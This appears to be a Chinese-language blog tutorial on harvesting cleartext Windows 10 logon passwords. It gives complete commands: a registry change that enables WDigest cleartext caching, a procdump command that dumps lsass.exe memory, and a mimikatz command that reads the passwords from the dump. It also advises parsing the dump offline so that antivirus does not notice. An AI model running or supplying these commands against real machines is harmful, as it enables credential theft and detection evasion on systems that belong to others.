procdump+mimikatz获取win10用户明文密码

测试环境：Win10 企业版LTSC 1809

工具下载：k8版本的mz64.exe、procdumpv9.0

原理：获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码

利用前提：拿到了admin权限的cmd，管理员用密码登录机器，并运行了lsass.exe进程，把密码保存在内存文件lsass进程中

抓取明文：修改注册表，等待系统重新登录，截取dmp文件

1、先修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改完之后，重新登录账号，此时抓出来的密码就是明文显示。

在默认情况下，当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，如下图，密码字段显示为null，此时可以通过修改注册表的方式抓取明文，但需要用户重新登录后才能成功抓取。

2、重登系统后，抓取dmp文件

管理员权限运行

procdump64.exe -accepteula -ma lsass.exe 1.dmp

也可以在任务管理器中导出文件，这里需要注意AppData隐藏文件夹

3、把dmp文件导出到本地使用mimikatz读取密码

我这里是直接在机器上运行mimikatz读取密码了，在实际运用中一般会导出到本地再读取密码，这样才能躲避杀软检测流量特征。对了，这里需要注意的是，一开始我是用官方2.2.0、2.1.1版本的mz通通报错，google发现这应该是跟mz版本还有win10版本有关。

mz64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

这里我用了k8的mz才没有报错，成功读出win10的明文密码